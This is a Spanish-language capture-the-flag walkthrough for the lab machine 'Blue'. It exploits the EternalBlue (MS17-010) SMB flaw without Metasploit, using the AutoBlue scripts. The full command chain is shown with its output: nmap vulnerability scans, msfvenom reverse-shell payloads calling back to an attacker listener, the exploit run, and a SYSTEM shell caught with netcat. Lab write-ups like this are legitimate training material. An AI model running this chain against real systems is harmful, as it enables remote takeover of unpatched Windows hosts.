Ya había hecho esta maquina pero con mucho mucho Metasploit. La verdad es que solo para OSCP tiene sentido no usar metasploit para eternal blue ha. Lo bueno es que descubrí un script que es casi igual de maravilloso.
Como siempre empezamos con un nmap (en este caso dos)
root@Kali2:~/Downloads# nmap -sC -sV -O 10.10.10.40 Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-04 21:07 CET Stats: 0:02:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 99.67% done; ETC: 21:09 (0:00:00 remaining) Nmap scan report for 10.10.10.40 Host is up (0.024s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown Device type: firewall Running (JUST GUESSING): Fortinet embedded (87%) OS CPE: cpe:/h:fortinet:fortigate_100d Aggressive OS guesses: Fortinet FortiGate 100D firewall (87%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_smb2-time: Protocol negotiation failed (SMB2) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 175.09 seconds
Y para checar vulnerabilidades
root@Kali2:~/Downloads# nmap --script vuln -p 445 10.10.10.40 Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-04 21:06 CET Nmap scan report for 10.10.10.40 Host is up (0.071s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 |_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx Nmap done: 1 IP address (1 host up) scanned in 30.32 seconds
Ahora que sabemos que es vulnerable a eternalblue bajamos un scrip maravilloso
# git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git root@Kali2:~/Downloads# git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git Cloning into 'AutoBlue-MS17-010'... remote: Enumerating objects: 26, done. remote: Counting objects: 100% (26/26), done. remote: Compressing objects: 100% (25/25), done. remote: Total 102 (delta 12), reused 2 (delta 1), pack-reused 76 Receiving objects: 100% (102/102), 76.26 KiB | 780.00 KiB/s, done. Resolving deltas: 100% (52/52), done.
Ahora generamos la shell
root@Kali2:~/Downloads# cd AutoBlue-MS17-010/shellcode/ root@Kali2:~/Downloads/AutoBlue-MS17-010/shellcode# ./shell_prep.sh _.-;;-._ '-..-'| || | '-..-'|_.-;;-._| '-..-'| || | '-..-'|_.-''-._| Eternal Blue Windows Shellcode Compiler Let's compile them windoos shellcodezzz Compiling x64 kernel shellcode Compiling x86 kernel shellcode kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n) y LHOST for reverse connection: 10.10.14.9 LPORT you want x64 to listen on: 1234 LPORT you want x86 to listen on: 1235 Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell 1 Type 0 to generate a staged payload or 1 to generate a stageless payload 1 Generating x64 cmd shell (stageless)... msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=10.10.14.9 LPORT=1234 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 460 bytes Saved as: sc_x64_msf.bin Generating x86 cmd shell (stageless)... msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.9 LPORT=1235 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 324 bytes Saved as: sc_x86_msf.bin MERGING SHELLCODE WOOOO!!! DONE
Ahora usamos el exploit para windows 7 (invalid_parameter es bueno… ja no se asusten)
root@Kali2:~/Downloads/AutoBlue-MS17-010/shellcode# cd .. root@Kali2:~/Downloads/AutoBlue-MS17-010# ls eternalblue_exploit10.py eternal_checker.py mysmb.py zzz_exploit.py eternalblue_exploit7.py LICENSE README.md root@Kali2:~/Downloads/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin shellcode size: 2203 numGroomConn: 13 Target OS: Windows 7 Professional 7601 Service Pack 1 SMB1 session setup allocate nonpaged pool success SMB1 session setup allocate nonpaged pool success good response status: INVALID_PARAMETER done
root@Kali2:~/Downloads# nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.10.40] 49158 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system
Y listo somos admin de Eternal blue sin usar metasploit 🙂